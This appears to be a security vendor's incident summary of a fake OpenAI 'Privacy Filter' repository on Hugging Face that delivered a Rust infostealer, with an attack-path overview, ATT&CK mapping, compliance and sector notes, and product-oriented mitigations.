How did the malicious repository gain trust?

The repository typosquatted OpenAI's legitimate 'Privacy Filter' project and copied its model card nearly verbatim, making it appear authentic.

What measures can be taken to prevent such attacks?

Implementing strict verification processes for shared repositories, conducting regular security audits, and educating users on the risks of unverified code can help prevent such attacks.

Fake OpenAI Repository on Hugging Face Delivers Infostealer Malware

A malicious repository impersonating OpenAI's 'Privacy Filter' project on Hugging Face distributed infostealer malware to Windows users, emphasizing the need for vigilance in AI platform security.

Published: May 9, 2026

Share this on:

Executive Summary

In May 2026, a malicious repository named 'Open-OSS/privacy-filter' was discovered on Hugging Face, impersonating OpenAI's legitimate 'Privacy Filter' project. This repository contained a 'loader.py' script that, when executed, downloaded and ran a Rust-based infostealer malware on Windows systems. The malware targeted sensitive data, including browser credentials, cryptocurrency wallets, and system information. The repository reached the top of Hugging Face's trending list with over 244,000 downloads before being removed.

This incident underscores the growing trend of supply chain attacks targeting AI and machine learning platforms. As these platforms become integral to various industries, ensuring the integrity of shared repositories is paramount to prevent the distribution of malicious code.

Why This Matters Now

The increasing reliance on AI and machine learning platforms has made them attractive targets for cybercriminals. This incident highlights the urgent need for enhanced security measures and vigilance when utilizing shared repositories to prevent the infiltration of malicious code into trusted environments.

Attack Path Analysis

Attackers created a malicious repository on Hugging Face, impersonating OpenAI's 'Privacy Filter' project to distribute infostealer malware. Upon execution, the malware disabled SSL verification, fetched and executed a PowerShell command to download a batch file, which performed privilege escalation and downloaded the final payload. The Rust-based infostealer then exfiltrated sensitive data, including browser data, Discord tokens, cryptocurrency wallets, and system information, to a command-and-control server.

Kill Chain Progression

Initial Compromise

High

Privilege Escalation

High

Lateral Movement

Low

Command & Control

High

Exfiltration

High

Impact

High

Initial Compromise

Description

Attackers created a malicious repository on Hugging Face, impersonating OpenAI's 'Privacy Filter' project to distribute infostealer malware.

Confidence:

High

MITRE ATT&CK® Techniques

Initial Access

T1195.002

Supply Chain Compromise: Compromise Software Supply Chain

Initial Access

T1566.001

Phishing: Spearphishing Attachment

Execution

T1059.001

Command and Scripting Interpreter: PowerShell

Privilege Escalation

T1548.002

Abuse Elevation Control Mechanism: Bypass User Account Control

Defense Evasion

T1027

Obfuscated Files or Information

Collection

T1113

Screen Capture

Collection

T1005

Data from Local System

Exfiltration

T1041

Exfiltration Over C2 Channel

Potential Compliance Exposure

Mapping incident impact across multiple compliance frameworks.

PCI DSS 4.0 – Ensure software integrity

Control ID: 6.3.2

The incident involved a compromised software supply chain, violating the requirement to ensure software integrity.

NYDFS 23 NYCRR 500 – Cybersecurity Policy

Control ID: 500.03

The attack exploited weaknesses in software supply chain management, indicating deficiencies in the organization's cybersecurity policy.

DORA – ICT Risk Management Framework

Control ID: Article 5

The breach highlights inadequate ICT risk management practices, as the malicious repository was able to distribute malware to users.

CISA ZTMM 2.0 – Supply Chain Risk Management

Control ID: 3.1

The incident underscores the need for robust supply chain risk management to prevent the introduction of malicious code through third-party repositories.

NIS2 Directive – Security of Supply Chains

Control ID: Article 21

The attack demonstrates vulnerabilities in the supply chain, emphasizing the importance of securing supply chains as mandated by the directive.

Sector Implications

Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.

Computer Software/Engineering

Supply chain attacks targeting AI repositories expose development teams to infostealers compromising source code, credentials, and intellectual property through malicious packages.

Information Technology/IT

Fake OpenAI repositories deliver Rust-based infostealers targeting browser data, SSH credentials, and system information, requiring comprehensive egress filtering and anomaly detection.

Capital Markets/Hedge Fund/Private Equity

Cryptocurrency wallet targeting malware exfiltrates trading credentials and digital assets, necessitating zero trust segmentation and encrypted traffic controls for financial operations.

Higher Education/Acadamia

Academic researchers downloading AI models face credential theft and system compromise, requiring enhanced visibility controls and secure hybrid connectivity for research infrastructure.

Sources

Fake OpenAI repository on Hugging Face pushes infostealer malwarehttps://www.bleepingcomputer.com/news/security/fake-openai-repository-on-hugging-face-pushes-infostealer-malware/
Verified

Malware Found in Trending Hugging Face Repository 'Open-OSS/privacy-filter'https://www.hiddenlayer.com/insight/malware-found-in-trending-hugging-face-repository-open-oss-privacy-filter

Verified

The AI Supply Chain Threat: Malicious Models in Public Repositorieshttps://www.aisecurityfoundation.org/insights/malicious-models-supply-chain/

Verified

Frequently Asked Questions

The malware targeted browser credentials, cryptocurrency wallets, SSH, FTP, and VPN credentials, sensitive local files, and system information.

Cloud Native Security Fabric Mitigations and ControlsCNSF

Aviatrix Zero Trust CNSF is pertinent to this incident as it could likely limit the attacker's ability to escalate privileges, move laterally, and exfiltrate data by enforcing strict segmentation and controlled egress policies.

Initial Compromise

Control: Cloud Native Security Fabric (CNSF)

Mitigation: The CNSF may not directly prevent the initial compromise via a malicious repository, as this involves user interaction and external sources.

Privilege Escalation

Control: Zero Trust Segmentation

Mitigation: Zero Trust Segmentation could likely limit the malware's ability to exploit elevated privileges by restricting access to sensitive resources.

Lateral Movement

Control: East-West Traffic Security

Mitigation: East-West Traffic Security would likely limit the potential for lateral movement by monitoring and controlling internal traffic.

Command & Control

Control: Multicloud Visibility & Control

Mitigation: Multicloud Visibility & Control could likely detect and limit unauthorized outbound connections to command-and-control servers.

Exfiltration

Control: Egress Security & Policy Enforcement

Mitigation: Egress Security & Policy Enforcement would likely limit unauthorized data exfiltration by controlling outbound data flows.

Impact (Mitigations)

The implementation of CNSF controls would likely reduce the scope of data exfiltration, thereby limiting potential financial loss and identity theft.

Impact at a Glance

Affected Business Functions

Software Development
Data Science
Machine Learning Operations

Operational Disruption

Estimated downtime: 3 days

Financial Impact

Estimated loss: $50,000

Data Exposure

Potential exposure of sensitive credentials, including browser data, Discord tokens, cryptocurrency wallets, SSH, FTP, and VPN credentials.

Recommended Actions

• Implement Zero Trust Segmentation to restrict access and limit the spread of malware within the network.
• Utilize Egress Security & Policy Enforcement to monitor and control outbound traffic, preventing unauthorized data exfiltration.
• Deploy Inline IPS (Suricata) to detect and block known exploit patterns and malicious payloads.
• Enhance Threat Detection & Anomaly Response capabilities to identify and respond to suspicious activities promptly.
• Regularly audit and verify the integrity of third-party repositories and software to prevent supply chain attacks.

Secure the Paths Between Cloud Workloads

A cloud-native security fabric that enforces Zero Trust across workload communication—reducing attack paths, compliance risk, and operational complexity.

Stop Advanced Threats Get a Free Workload Attack Path Assessment Under Active Attack?

Fake OpenAI Repository on Hugging Face Delivers Infostealer Malware

Executive Summary

Why This Matters Now

Attack Path Analysis

Kill Chain Progression

Initial Compromise

Description

MITRE ATT&CK® Techniques

Supply Chain Compromise: Compromise Software Supply Chain

Phishing: Spearphishing Attachment

Command and Scripting Interpreter: PowerShell

Abuse Elevation Control Mechanism: Bypass User Account Control

Obfuscated Files or Information

Screen Capture

Data from Local System

Exfiltration Over C2 Channel

Potential Compliance Exposure

PCI DSS 4.0 – Ensure software integrity

NYDFS 23 NYCRR 500 – Cybersecurity Policy

DORA – ICT Risk Management Framework

CISA ZTMM 2.0 – Supply Chain Risk Management

NIS2 Directive – Security of Supply Chains

Sector Implications

Computer Software/Engineering

Information Technology/IT

Capital Markets/Hedge Fund/Private Equity

Higher Education/Acadamia

Sources

Frequently Asked Questions

Cloud Native Security Fabric Mitigations and ControlsCNSF

Impact at a Glance

Affected Business Functions

Recommended Actions

Key Takeaways & Next Steps

Secure the Paths Between Cloud Workloads